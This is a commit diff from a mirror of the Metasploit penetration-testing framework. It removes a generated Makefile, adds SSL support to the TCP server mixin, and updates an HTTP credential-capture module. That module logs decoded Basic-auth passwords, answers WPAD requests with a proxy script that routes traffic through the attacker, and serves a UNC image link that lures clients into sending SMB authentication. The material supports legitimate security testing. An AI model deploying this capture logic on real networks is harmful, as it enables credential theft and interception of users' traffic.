infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixes #218. Updates the http password capture module. Removes a bogus makefile from the tree 

git-svn-id: file:///home/svn/framework3/trunk@5452 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-03-22 06:34:52 +00:00
parent 8138c2259f
commit 1ea29ba8f0
4 changed files with 42 additions and 165 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

142
external/ruby-lorcon/Makefile vendored
View File

@ -1,142 +0,0 @@
SHELL = /bin/sh
#### Start of system configuration section. ####
srcdir = .
topdir = /usr/lib/ruby/1.8/i686-linux
hdrdir = $(topdir)
VPATH = $(srcdir):$(topdir):$(hdrdir)
prefix = $(DESTDIR)/usr
exec_prefix = $(DESTDIR)/usr
sitedir = $(DESTDIR)/usr/lib/ruby/site_ruby
rubylibdir = $(libdir)/ruby/$(ruby_version)
archdir = $(rubylibdir)/$(arch)
sbindir = $(exec_prefix)/sbin
datadir = $(DESTDIR)/usr/share
includedir = $(prefix)/include
infodir = $(DESTDIR)/usr/share/info
sysconfdir = $(DESTDIR)/etc
mandir = $(DESTDIR)/usr/share/man
libdir = $(DESTDIR)/usr/lib
sharedstatedir = $(prefix)/com
oldincludedir = $(DESTDIR)/usr/include
sitearchdir = $(sitelibdir)/$(sitearch)
bindir = $(exec_prefix)/bin
localstatedir = $(DESTDIR)/var/lib
sitelibdir = $(sitedir)/$(ruby_version)
libexecdir = $(exec_prefix)/libexec
CC = i686-pc-linux-gnu-gcc
LIBRUBY = $(LIBRUBY_SO)
LIBRUBY_A = lib$(RUBY_SO_NAME)-static.a
LIBRUBYARG_SHARED = -Wl,-R -Wl,$(libdir) -L$(libdir) -L. -l$(RUBY_SO_NAME)
LIBRUBYARG_STATIC = -l$(RUBY_SO_NAME)-static
RUBY_EXTCONF_H =
CFLAGS = -fPIC -O2 -march=pentium4 -fPIC
INCFLAGS = -I. -I. -I/usr/lib/ruby/1.8/i686-linux -I.
CPPFLAGS =
CXXFLAGS = $(CFLAGS)
DLDFLAGS =
LDSHARED = $(CC) -shared
AR = i686-pc-linux-gnu-ar
EXEEXT =
RUBY_INSTALL_NAME = ruby18
RUBY_SO_NAME = ruby18
arch = i686-linux
sitearch = i686-linux
ruby_version = 1.8
ruby = /usr/bin/ruby18
RUBY = $(ruby)
RM = rm -f
MAKEDIRS = mkdir -p
INSTALL = /bin/install -c
INSTALL_PROG = $(INSTALL) -m 0755
INSTALL_DATA = $(INSTALL) -m 644
COPY = cp
#### End of system configuration section. ####
preload =
libpath = $(libdir)
LIBPATH = -L'$(libdir)' -Wl,-R'$(libdir)'
DEFFILE =
CLEANFILES =
DISTCLEANFILES =
extout =
extout_prefix =
target_prefix =
LOCAL_LIBS =
LIBS = $(LIBRUBYARG_SHARED) -lorcon -ldl -lcrypt -lm -lc
SRCS = Lorcon.c
OBJS = Lorcon.o
TARGET = Lorcon
DLLIB = $(TARGET).so
EXTSTATIC =
STATIC_LIB =
RUBYCOMMONDIR = $(sitedir)$(target_prefix)
RUBYLIBDIR = $(sitelibdir)$(target_prefix)
RUBYARCHDIR = $(sitearchdir)$(target_prefix)
TARGET_SO = $(DLLIB)
CLEANLIBS = $(TARGET).so $(TARGET).il? $(TARGET).tds $(TARGET).map
CLEANOBJS = *.o *.a *.s[ol] *.pdb *.exp *.bak
all: $(DLLIB)
static: $(STATIC_LIB)
clean:
@-$(RM) $(CLEANLIBS) $(CLEANOBJS) $(CLEANFILES)
distclean: clean
@-$(RM) Makefile $(RUBY_EXTCONF_H) conftest.* mkmf.log
@-$(RM) core ruby$(EXEEXT) *~ $(DISTCLEANFILES)
realclean: distclean
install: install-so install-rb
install-so: $(RUBYARCHDIR)
install-so: $(RUBYARCHDIR)/$(DLLIB)
$(RUBYARCHDIR)/$(DLLIB): $(DLLIB)
$(INSTALL_PROG) $(DLLIB) $(RUBYARCHDIR)
install-rb: pre-install-rb install-rb-default
install-rb-default: pre-install-rb-default
pre-install-rb: Makefile
pre-install-rb-default: Makefile
$(RUBYARCHDIR):
$(MAKEDIRS) $@
site-install: site-install-so site-install-rb
site-install-so: install-so
site-install-rb: install-rb
.SUFFIXES: .c .m .cc .cxx .cpp .C .o
.cc.o:
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
.cxx.o:
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
.cpp.o:
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
.C.o:
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
.c.o:
$(CC) $(INCFLAGS) $(CPPFLAGS) $(CFLAGS) -c $<
$(DLLIB): $(OBJS)
@-$(RM) $@
$(LDSHARED) $(DLDFLAGS) $(LIBPATH) -o $@ $(OBJS) $(LOCAL_LIBS) $(LIBS)
$(OBJS): ruby.h defines.h

12
lib/msf/core/exploit/tcp.rb
View File

@ -251,8 +251,9 @@ module Exploit::Remote::TcpServer
register_options(
[
Opt::SSL,
OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]),
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ])
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),
], Msf::Exploit::Remote::TcpServer)
register_evasion_options(
@ -309,6 +310,7 @@ module Exploit::Remote::TcpServer
self.service = Rex::Socket::TcpServer.create(
'LocalHost' => srvhost,
'LocalPort' => srvport,
'SSL' => ssl,
'Context' =>
{
'Msf' => framework,
@ -389,6 +391,14 @@ module Exploit::Remote::TcpServer
datastore['SRVPORT']
end
#
# Returns the SSL option
#
def ssl
datastore['SSL']
end
#
# Re-generates the payload, substituting the current RHOST and RPORT with
# the supplied client host and port from the socket.

32
lib/rex/socket/ssl_tcp_server.rb
View File

@ -25,19 +25,23 @@ module Rex::Socket::SslTcpServer
def accept(opts = {})
sock = super()
if (sock)
sock.extend(Rex::Socket::Tcp)
sock.context = self.context
pn = sock.getpeername
return nil if not sock
sock.extend(Rex::Socket::Tcp)
sock.context = self.context
pn = sock.getpeername
sock.peerhost = pn[1]
sock.peerport = pn[2]
end
t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx)
t.extend(Rex::Socket::Tcp)
t.accept
t
begin
t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx)
t.extend(Rex::Socket::Tcp)
t.peerhost = pn[1]
t.peerport = pn[2]
t.accept
t
rescue ::OpenSSL::SSL::SSLError
sock.close
nil
end
end
@ -65,8 +69,8 @@ module Rex::Socket::SslTcpServer
cert.subject = subject
cert.issuer = issuer
cert.not_before = Time.now
cert.not_after = Time.now + 3600
cert.not_before = Time.now - 7200
cert.not_after = Time.now + 7200
cert.public_key = key.public_key
ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)
cert.extensions = [

21
modules/auxiliary/server/capture/http.rb
View File

@ -53,6 +53,8 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
end
def run
@myhost = datastore['SRVHOST']
@myport = datastore['SRVPORT']
exploit()
end
@ -91,27 +93,30 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
end
def dispatch_request(cli, req)
mysrc = Rex::Socket.source_address(cli.peerhost)
hhead = (req['Host'] || @myhost).split(':', 2)[0]
if(req['Authorization'] and req['Authorization'] =~ /basic/i)
basic,auth = req['Authorization'].split(/\s+/)
user,pass = Rex::Text.decode_base64(auth).split(':', 2)
report_auth_info(
:host => cli.peerhost,
:proto => 'http',
:targ_host => req['Host'] || datastore['SRVHOST'],
:targ_port => datastore['SRVPORT'],
:targ_host => hhead,
:targ_port => @myport,
:user => user,
:pass => pass,
:extra => req.resource.to_s
)
print_status("HTTP LOGIN #{req['Host']}:#{datastore['SRVPORT']} #{user} / #{pass} => #{req.resource}")
print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}")
end
if(req.resource =~ /^wpad.dat|.*\.pac$/i)
prx = "function FindProxyForURL(url, host) { return 'PROXY #{Rex::Socket.source_address(cli.peerhost)}:#{datastore['SRVPORT']}'; }"
prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }"
res =
"HTTP/1.1 200 OK\r\n" +
"Host: #{req['Host'] || datastore['SRVHOST']}\r\n" +
"Host: #{hhead}\r\n" +
"Content-Type: application/x-ns-proxy-autoconfig\r\n" +
"Content-Length: #{prx.length}\r\n" +
"Connection: Close\r\n\r\n#{prx}"
@ -120,9 +125,9 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
return
end
print_status("HTTP REQUEST #{req['Host']}:#{datastore['SRVPORT']} #{req.resource}")
print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource}")
data = "<html><head><title>Connecting...</title></head><body><img src='\\\\#{Rex::Socket.source_address(cli.peerhost)}\\public\\loading.jpg' width='1' height='1'></body></html>"
data = "<html><head><title>Connecting...</title></head><body><img src='\\\\#{mysrc}\\public\\loading.jpg' width='1' height='1'></body></html>"
res =
"HTTP/1.1 200 OK\r\n" +
"Host: #{req['Host'] || datastore['SRVHOST']}\r\n" +